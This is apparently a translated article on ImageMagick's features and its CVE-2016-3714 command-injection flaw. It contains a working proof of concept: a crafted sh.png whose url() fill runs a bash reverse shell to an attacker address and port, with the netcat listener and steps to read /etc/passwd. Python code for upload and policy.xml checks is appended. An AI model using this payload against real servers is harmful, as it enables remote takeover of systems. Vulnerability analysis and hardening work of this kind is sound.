1.1 ImageMagick description
1. ImageMagick description
ImageMagick is a powerful, stable and open-source set of tools and development kits that can read, write and process images in more than 89 basic file formats, including the popular TIFF, JPEG, GIF, PNG, PDF and PhotoCD formats. With ImageMagick you can generate images dynamically according to a web application's needs, or resize, rotate, sharpen, reduce the colours of, or add effects to one image or a group of images, and save the result in the same or another format. These operations can be performed from the command line or from C/C++, Perl, Java, PHP, Python or Ruby programs. ImageMagick also provides a high-quality 2D toolkit with partial SVG support. Its main focus is on performance, reducing bugs and providing a stable API and ABI; the official site is http://www.imagemagick.org/.
ImageMagick is software for creating, editing and compositing images. It can read, convert and write images in many formats; it can crop images, replace colours, apply various effects, rotate and compose images, and attach text, lines, polygons, ellipses and curves to an image, including extended rotation. ImageMagick is free software: the full source code is open, and you may freely use, copy, modify and publish it. It supports most operating systems.
2. ImageMagick main function
(1) Convert an image from one format to another, including directly into an icon.
(2) Resize, rotate, sharpen, reduce colours, and apply picture effects.
(3) Build a composite image of thumbnails (a montage of image thumbnails).
(4) Produce transparent-background images suited to the web.
(5) Convert a set of images directly into a GIF animation.
(6) Combine several pictures into a single composite image (montage).
(7) Write text or draw shapes on a picture, with text shadow and border rendering.
(8) Add a border or frame to an image.
(9) Obtain information about an image's characteristics.
(10) Almost every conventional plug-in function that GIMP offers, including rendering of various curve parameters. The command syntax, however, is complicated enough.
ImageMagick can be compiled on almost any non-proprietary operating system, on either a 32-bit or 64-bit CPU, including Linux, Windows 95/98/ME/NT 4.0/2000/XP, Macintosh (MacOS 9/10), VMS and OS/2.
1.2 ImageMagick (CVE-2016-3714) remote code execution vulnerability analysis
The ImageMagick (CVE-2016-3714) remote code execution vulnerability is caused by insufficient character filtering: the file name passed to the back-end command is not filtered strictly enough, which allows remote code execution during the conversion of a variety of file formats.
Affected version range:
1.3 Available POC tests
CentOS 5.8 + ImageMagick 6.2.8
On CentOS the default installation is ImageMagick 6.2.8; this test installs version 6.7.7-10.
Note: the tar.xz file needs to be unpacked with 7zip to a tar file, which is then decompressed with tar -zxvf.
First construct a carefully prepared picture. Save the following content as sh.png, where 122.115.4x.3x is the server that listens for the reverse shell and 4433 is its listening port.
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/122.115.4x.3x/4433 0>&1")'
Execute the command
Before executing the command, run “nc -vv -l -p 4433” on the server that receives the reverse shell. Then run “convert sh.png 1.png”; the terminal does not respond until the reverse shell exits, as shown in Figure 1.
Figure 1 Executing the convert command
After the convert command runs, the listener on the server receives the connection after a delay of a few seconds, depending on network conditions, as shown in Figure 2, giving direct access to the reverse shell.
Figure 2 Obtaining the reverse shell
When the reverse shell terminates, an error message is displayed, as shown in Figure 3.
Figure 3 The error message
1.4 Summary and discussion
(1) Construct exp.png
(2) Run the exploit to get the id and view the passwd file
In terminal mode, run convert exp.png 1.png; afterwards the output of id and the contents of passwd are displayed, as shown in Figure 4, indicating that the vulnerability exists.
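A defender's counterpart to the sh.png trick described above, added here as an example and not part of the original article: the first function rejects an upload whose bytes are MVG drawing commands, or otherwise do not match the format its extension claims, before the file ever reaches convert; the second audits an ImageMagick policy.xml for the coder restrictions (EPHEMERAL, URL, HTTPS, MVG, MSL, TEXT, SHOW, WIN, PLT) that the vendor mitigation for CVE-2016-3714 relies on. The sample files, policy documents and function names are constructed for this example, and the sample payload line carries a placeholder instead of a command.

```python
import re
import xml.etree.ElementTree as ET

# Magic bytes of the raster formats a typical upload handler accepts.
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "gif": b"GIF8"}
# ImageMagick selects the coder from the file content, not the extension, so MVG
# drawing commands inside a ".png" are the tell-tale sign of the sh.png trick.
MVG_MARKERS = re.compile(rb"^\s*(push graphic-context|viewbox\s|fill\s+'url\()", re.M | re.I)
# Coders the vendor mitigation for CVE-2016-3714 disables in policy.xml.
DANGEROUS_CODERS = {"EPHEMERAL", "URL", "HTTPS", "MVG", "MSL", "TEXT", "SHOW", "WIN", "PLT"}


def check_upload(filename: str, data: bytes) -> str:
    """Return 'ok' when the bytes really are the format the extension claims, else a reason."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in MAGIC:
        return "extension not allowed"
    if MVG_MARKERS.search(data):
        return "MVG drawing commands in a raster upload"
    if not data.startswith(MAGIC[ext]):
        return "content does not match claimed format"
    return "ok"


def missing_coder_restrictions(policy_xml: str) -> list:
    """Return the dangerous coders that a policy.xml does NOT set to rights="none"."""
    root = ET.fromstring(policy_xml)
    disabled = {
        (p.get("pattern") or "").upper()
        for p in root.iter("policy")
        if p.get("domain") == "coder" and p.get("rights") == "none"
    }
    return sorted(DANGEROUS_CODERS - disabled)


# Constructed samples: a text payload named like a PNG, and a real PNG header.
FAKE_PNG = b"fill 'url(https://example.com/image.jpg\"|COMMAND\")'\n"
REAL_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
# Constructed policies: a stock file with only a resource limit, and a hardened one.
WEAK_POLICY = '<policymap><policy domain="resource" name="memory" value="256MiB"/></policymap>'
HARDENED_POLICY = "<policymap>" + "".join(
    '<policy domain="coder" rights="none" pattern="%s"/>' % c for c in sorted(DANGEROUS_CODERS)
) + "</policymap>"

if __name__ == "__main__":
    print(check_upload("sh.png", FAKE_PNG))             # MVG drawing commands in a raster upload
    print(check_upload("photo.png", REAL_PNG))          # ok
    print(missing_coder_restrictions(WEAK_POLICY))      # all nine coders still enabled
    print(missing_coder_restrictions(HARDENED_POLICY))  # []
```

The upload check is a complement to, not a replacement for, the policy.xml restrictions: a valid raster file can still reach a vulnerable coder through other routes, so both checks belong in place.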